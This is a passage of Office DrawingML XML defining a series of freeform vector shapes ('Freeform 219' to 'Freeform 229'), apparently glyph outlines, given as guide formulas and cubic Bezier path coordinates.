                  <a:close/>
                  <a:moveTo>
                    <a:pt x="109" y="285"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="285"/>
                    <a:pt x="35" y="258"/>
                    <a:pt x="35" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="193"/>
                    <a:pt x="64" y="161"/>
                    <a:pt x="109" y="161"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="161"/>
                    <a:pt x="183" y="193"/>
                    <a:pt x="183" y="223"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="258"/>
                    <a:pt x="150" y="285"/>
                    <a:pt x="109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7" name="Freeform 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D9E95BE-8238-4F87-952D-96BE374574F5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4249739" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 217"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 217"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 15 w 217"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 217"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 217"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 217"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 217"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 169 w 217"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 148 w 217"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 217"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 217"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 217"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 217"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 217"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 217"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 38 w 217"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 44 w 217"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 23 w 217"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 217"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 217"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 217 w 217"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 217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4"/>
                    <a:pt x="167" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="15" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="53"/>
                    <a:pt x="56" y="48"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="31"/>
                    <a:pt x="169" y="49"/>
                    <a:pt x="169" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="148" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="132" y="127"/>
                    <a:pt x="119" y="128"/>
                    <a:pt x="101" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="65" y="131"/>
                    <a:pt x="65" y="146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8" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="38" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="23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8" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="217" y="270"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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8" name="Freeform 220">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D21EDD1A-1477-4807-9DD5-62B1A3E058E1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4351339" y="3267075"/>
              <a:ext cx="80963" cy="125413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1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49" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="158"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="251"/>
                    <a:pt x="50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7"/>
                    <a:pt x="34" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="80"/>
                    <a:pt x="68" y="31"/>
                    <a:pt x="105" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="31"/>
                    <a:pt x="177" y="79"/>
                    <a:pt x="177" y="153"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="227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9" name="Freeform 221">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35C4EAEF-40A4-4F1F-A404-CA673CE15AC5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4452939" y="3267075"/>
              <a:ext cx="79375" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 173 w 208"/>
                <a:gd name="T1" fmla="*/ 174 h 316"/>
                <a:gd name="T2" fmla="*/ 81 w 208"/>
                <a:gd name="T3" fmla="*/ 285 h 316"/>
                <a:gd name="T4" fmla="*/ 48 w 208"/>
                <a:gd name="T5" fmla="*/ 277 h 316"/>
                <a:gd name="T6" fmla="*/ 52 w 208"/>
                <a:gd name="T7" fmla="*/ 263 h 316"/>
                <a:gd name="T8" fmla="*/ 31 w 208"/>
                <a:gd name="T9" fmla="*/ 241 h 316"/>
                <a:gd name="T10" fmla="*/ 8 w 208"/>
                <a:gd name="T11" fmla="*/ 265 h 316"/>
                <a:gd name="T12" fmla="*/ 81 w 208"/>
                <a:gd name="T13" fmla="*/ 316 h 316"/>
                <a:gd name="T14" fmla="*/ 208 w 208"/>
                <a:gd name="T15" fmla="*/ 155 h 316"/>
                <a:gd name="T16" fmla="*/ 105 w 208"/>
                <a:gd name="T17" fmla="*/ 0 h 316"/>
                <a:gd name="T18" fmla="*/ 0 w 208"/>
                <a:gd name="T19" fmla="*/ 102 h 316"/>
                <a:gd name="T20" fmla="*/ 98 w 208"/>
                <a:gd name="T21" fmla="*/ 203 h 316"/>
                <a:gd name="T22" fmla="*/ 173 w 208"/>
                <a:gd name="T23" fmla="*/ 174 h 316"/>
                <a:gd name="T24" fmla="*/ 101 w 208"/>
                <a:gd name="T25" fmla="*/ 172 h 316"/>
                <a:gd name="T26" fmla="*/ 34 w 208"/>
                <a:gd name="T27" fmla="*/ 102 h 316"/>
                <a:gd name="T28" fmla="*/ 105 w 208"/>
                <a:gd name="T29" fmla="*/ 31 h 316"/>
                <a:gd name="T30" fmla="*/ 149 w 208"/>
                <a:gd name="T31" fmla="*/ 52 h 316"/>
                <a:gd name="T32" fmla="*/ 168 w 208"/>
                <a:gd name="T33" fmla="*/ 97 h 316"/>
                <a:gd name="T34" fmla="*/ 167 w 208"/>
                <a:gd name="T35" fmla="*/ 101 h 316"/>
                <a:gd name="T36" fmla="*/ 169 w 208"/>
                <a:gd name="T37" fmla="*/ 116 h 316"/>
                <a:gd name="T38" fmla="*/ 101 w 208"/>
                <a:gd name="T39" fmla="*/ 17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" h="316">
                  <a:moveTo>
                    <a:pt x="173" y="174"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="236"/>
                    <a:pt x="129" y="285"/>
                    <a:pt x="81" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="285"/>
                    <a:pt x="58" y="285"/>
                    <a:pt x="48" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="275"/>
                    <a:pt x="52" y="272"/>
                    <a:pt x="52" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="251"/>
                    <a:pt x="43" y="241"/>
                    <a:pt x="31" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="241"/>
                    <a:pt x="8" y="250"/>
                    <a:pt x="8" y="265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="280"/>
                    <a:pt x="17" y="316"/>
                    <a:pt x="81" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="147" y="316"/>
                    <a:pt x="208" y="254"/>
                    <a:pt x="208" y="155"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="208" y="35"/>
                    <a:pt x="153" y="0"/>
                    <a:pt x="105" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="0"/>
                    <a:pt x="0" y="42"/>
                    <a:pt x="0" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="159"/>
                    <a:pt x="43" y="203"/>
                    <a:pt x="98" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="203"/>
                    <a:pt x="150" y="195"/>
                    <a:pt x="173" y="174"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="101" y="172"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="172"/>
                    <a:pt x="34" y="139"/>
                    <a:pt x="34" y="102"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="59"/>
                    <a:pt x="69" y="31"/>
                    <a:pt x="105" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="31"/>
                    <a:pt x="141" y="42"/>
                    <a:pt x="149" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="68"/>
                    <a:pt x="168" y="94"/>
                    <a:pt x="168" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="98"/>
                    <a:pt x="167" y="99"/>
                    <a:pt x="167" y="101"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="167" y="104"/>
                    <a:pt x="169" y="112"/>
                    <a:pt x="169" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="144"/>
                    <a:pt x="142" y="172"/>
                    <a:pt x="101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0" name="Freeform 222">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DD260-3E5C-412C-9328-2B1C9F45126A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4581526" y="3365500"/>
              <a:ext cx="23813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1" name="Freeform 223">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E469ABD3-8D5C-40DA-9D76-438340CC156E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4645026" y="3270250"/>
              <a:ext cx="92075" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 77 w 238"/>
                <a:gd name="T1" fmla="*/ 111 h 307"/>
                <a:gd name="T2" fmla="*/ 77 w 238"/>
                <a:gd name="T3" fmla="*/ 20 h 307"/>
                <a:gd name="T4" fmla="*/ 57 w 238"/>
                <a:gd name="T5" fmla="*/ 0 h 307"/>
                <a:gd name="T6" fmla="*/ 21 w 238"/>
                <a:gd name="T7" fmla="*/ 0 h 307"/>
                <a:gd name="T8" fmla="*/ 0 w 238"/>
                <a:gd name="T9" fmla="*/ 15 h 307"/>
                <a:gd name="T10" fmla="*/ 20 w 238"/>
                <a:gd name="T11" fmla="*/ 30 h 307"/>
                <a:gd name="T12" fmla="*/ 43 w 238"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 43 w 238"/>
                <a:gd name="T15" fmla="*/ 284 h 307"/>
                <a:gd name="T16" fmla="*/ 60 w 238"/>
                <a:gd name="T17" fmla="*/ 304 h 307"/>
                <a:gd name="T18" fmla="*/ 77 w 238"/>
                <a:gd name="T19" fmla="*/ 282 h 307"/>
                <a:gd name="T20" fmla="*/ 135 w 238"/>
                <a:gd name="T21" fmla="*/ 307 h 307"/>
                <a:gd name="T22" fmla="*/ 238 w 238"/>
                <a:gd name="T23" fmla="*/ 197 h 307"/>
                <a:gd name="T24" fmla="*/ 140 w 238"/>
                <a:gd name="T25" fmla="*/ 86 h 307"/>
                <a:gd name="T26" fmla="*/ 77 w 238"/>
                <a:gd name="T27" fmla="*/ 111 h 307"/>
                <a:gd name="T28" fmla="*/ 77 w 238"/>
                <a:gd name="T29" fmla="*/ 209 h 307"/>
                <a:gd name="T30" fmla="*/ 77 w 238"/>
                <a:gd name="T31" fmla="*/ 173 h 307"/>
                <a:gd name="T32" fmla="*/ 137 w 238"/>
                <a:gd name="T33" fmla="*/ 117 h 307"/>
                <a:gd name="T34" fmla="*/ 203 w 238"/>
                <a:gd name="T35" fmla="*/ 197 h 307"/>
                <a:gd name="T36" fmla="*/ 133 w 238"/>
                <a:gd name="T37" fmla="*/ 277 h 307"/>
                <a:gd name="T38" fmla="*/ 77 w 238"/>
                <a:gd name="T39" fmla="*/ 20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7">
                  <a:moveTo>
                    <a:pt x="77" y="111"/>
                  </a:move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84"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="294"/>
                    <a:pt x="43" y="304"/>
                    <a:pt x="60" y="304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="304"/>
                    <a:pt x="77" y="294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8" y="260"/>
                    <a:pt x="238" y="197"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238" y="135"/>
                    <a:pt x="193" y="86"/>
                    <a:pt x="140" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="116" y="86"/>
                    <a:pt x="94" y="95"/>
                    <a:pt x="77" y="111"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="77" y="209"/>
                  </a:move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2" name="Freeform 224">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD6B25A-094B-440B-97EB-C53C0CF3F771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4751389" y="3268663"/>
              <a:ext cx="76200" cy="122238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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 52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0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20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0 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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0" y="92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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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3" name="Freeform 225">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA9365A4-A17C-41E9-892F-9DBD613DC461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4851401" y="3268663"/>
              <a:ext cx="76200" cy="122238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4 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 52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1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21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1 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156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9" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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4" name="Freeform 226">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D7591A9-C845-4E79-8C0F-63F7CDCA9B20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951414" y="3268663"/>
              <a:ext cx="76200" cy="122238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3 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 175 w 197"/>
                <a:gd name="T15" fmla="*/ 52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0 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 20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0 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 20 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 155 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 155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0" y="92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0" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="155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" name="Freeform 227">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4702A98B-5B62-4023-BAAB-E1722B546A25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5051426" y="3268663"/>
              <a:ext cx="76200" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106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6 w 197"/>
                <a:gd name="T9" fmla="*/ 92 h 307"/>
                <a:gd name="T10" fmla="*/ 106 w 197"/>
                <a:gd name="T11" fmla="*/ 69 h 307"/>
                <a:gd name="T12" fmla="*/ 154 w 197"/>
                <a:gd name="T13" fmla="*/ 30 h 307"/>
                <a:gd name="T14" fmla="*/ 176 w 197"/>
                <a:gd name="T15" fmla="*/ 52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1 w 197"/>
                <a:gd name="T27" fmla="*/ 108 h 307"/>
                <a:gd name="T28" fmla="*/ 21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1 w 197"/>
                <a:gd name="T35" fmla="*/ 277 h 307"/>
                <a:gd name="T36" fmla="*/ 0 w 197"/>
                <a:gd name="T37" fmla="*/ 292 h 307"/>
                <a:gd name="T38" fmla="*/ 21 w 197"/>
                <a:gd name="T39" fmla="*/ 307 h 307"/>
                <a:gd name="T40" fmla="*/ 156 w 197"/>
                <a:gd name="T41" fmla="*/ 307 h 307"/>
                <a:gd name="T42" fmla="*/ 176 w 197"/>
                <a:gd name="T43" fmla="*/ 292 h 307"/>
                <a:gd name="T44" fmla="*/ 156 w 197"/>
                <a:gd name="T45" fmla="*/ 277 h 307"/>
                <a:gd name="T46" fmla="*/ 106 w 197"/>
                <a:gd name="T47" fmla="*/ 277 h 307"/>
                <a:gd name="T48" fmla="*/ 106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6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6" y="92"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106" y="69"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="30"/>
                    <a:pt x="139" y="30"/>
                    <a:pt x="154" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="154" y="32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1" y="92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1" y="307"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="156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6" y="277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106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" name="Freeform 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A75470EF-E5C7-4F88-B4D9-CEF174E52624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153026" y="3267075"/>
              <a:ext cx="82550" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 217"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 217"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 109 w 217"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 14 w 217"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 217"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 217"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 54 w 217"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 217"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 168 w 217"/>
                <a:gd name="T17" fmla="*/ 71 h 316"/>
                <a:gd name="T18" fmla="*/ 147 w 217"/>
                <a:gd name="T19" fmla="*/ 114 h 316"/>
                <a:gd name="T20" fmla="*/ 101 w 217"/>
                <a:gd name="T21" fmla="*/ 129 h 316"/>
                <a:gd name="T22" fmla="*/ 65 w 217"/>
                <a:gd name="T23" fmla="*/ 146 h 316"/>
                <a:gd name="T24" fmla="*/ 85 w 217"/>
                <a:gd name="T25" fmla="*/ 161 h 316"/>
                <a:gd name="T26" fmla="*/ 108 w 217"/>
                <a:gd name="T27" fmla="*/ 161 h 316"/>
                <a:gd name="T28" fmla="*/ 183 w 217"/>
                <a:gd name="T29" fmla="*/ 224 h 316"/>
                <a:gd name="T30" fmla="*/ 110 w 217"/>
                <a:gd name="T31" fmla="*/ 285 h 316"/>
                <a:gd name="T32" fmla="*/ 38 w 217"/>
                <a:gd name="T33" fmla="*/ 257 h 316"/>
                <a:gd name="T34" fmla="*/ 44 w 217"/>
                <a:gd name="T35" fmla="*/ 241 h 316"/>
                <a:gd name="T36" fmla="*/ 22 w 217"/>
                <a:gd name="T37" fmla="*/ 219 h 316"/>
                <a:gd name="T38" fmla="*/ 0 w 217"/>
                <a:gd name="T39" fmla="*/ 243 h 316"/>
                <a:gd name="T40" fmla="*/ 110 w 217"/>
                <a:gd name="T41" fmla="*/ 316 h 316"/>
                <a:gd name="T42" fmla="*/ 217 w 217"/>
                <a:gd name="T43" fmla="*/ 224 h 316"/>
                <a:gd name="T44" fmla="*/ 161 w 217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4"/>
                    <a:pt x="166" y="0"/>
                    <a:pt x="109" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="0"/>
                    <a:pt x="14" y="24"/>
                    <a:pt x="14" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="75"/>
                    <a:pt x="27" y="82"/>
                    <a:pt x="37" y="82"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="82"/>
                    <a:pt x="59" y="73"/>
                    <a:pt x="59" y="60"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="53"/>
                    <a:pt x="56" y="48"/>
                    <a:pt x="54" y="46"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="70" y="31"/>
                    <a:pt x="105" y="31"/>
                    <a:pt x="110" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="31"/>
                    <a:pt x="168" y="49"/>
                    <a:pt x="168" y="71"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="86"/>
                    <a:pt x="161" y="103"/>
                    <a:pt x="147" y="114"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="127"/>
                    <a:pt x="119" y="128"/>
                    <a:pt x="101" y="129"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="131"/>
                    <a:pt x="65" y="131"/>
                    <a:pt x="65" y="146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7" y="161"/>
                    <a:pt x="183" y="195"/>
                    <a:pt x="183" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="254"/>
                    <a:pt x="155" y="285"/>
                    <a:pt x="110" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="285"/>
                    <a:pt x="51" y="280"/>
                    <a:pt x="38" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="41" y="254"/>
                    <a:pt x="44" y="251"/>
                    <a:pt x="44" y="241"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="229"/>
                    <a:pt x="35" y="219"/>
                    <a:pt x="22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8" y="316"/>
                    <a:pt x="110" y="316"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="316"/>
                    <a:pt x="217" y="270"/>
                    <a:pt x="217" y="224"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217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" name="Freeform 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F6915AC-D051-4C3F-9B39-FDAE026CD05C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253039" y="3267075"/>
              <a:ext cx="84138" cy="125413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 161 w 218"/>
                <a:gd name="T1" fmla="*/ 144 h 316"/>
                <a:gd name="T2" fmla="*/ 203 w 218"/>
                <a:gd name="T3" fmla="*/ 70 h 316"/>
                <a:gd name="T4" fmla="*/ 110 w 218"/>
                <a:gd name="T5" fmla="*/ 0 h 316"/>
                <a:gd name="T6" fmla="*/ 15 w 218"/>
                <a:gd name="T7" fmla="*/ 59 h 316"/>
                <a:gd name="T8" fmla="*/ 37 w 218"/>
                <a:gd name="T9" fmla="*/ 82 h 316"/>
                <a:gd name="T10" fmla="*/ 59 w 218"/>
                <a:gd name="T11" fmla="*/ 60 h 316"/>
                <a:gd name="T12" fmla="*/ 55 w 218"/>
                <a:gd name="T13" fmla="*/ 46 h 316"/>
                <a:gd name="T14" fmla="*/ 110 w 218"/>
                <a:gd name="T15" fmla="*/ 31 h 316"/>
                <a:gd name="T16" fmla="*/ 169 w 218"/>
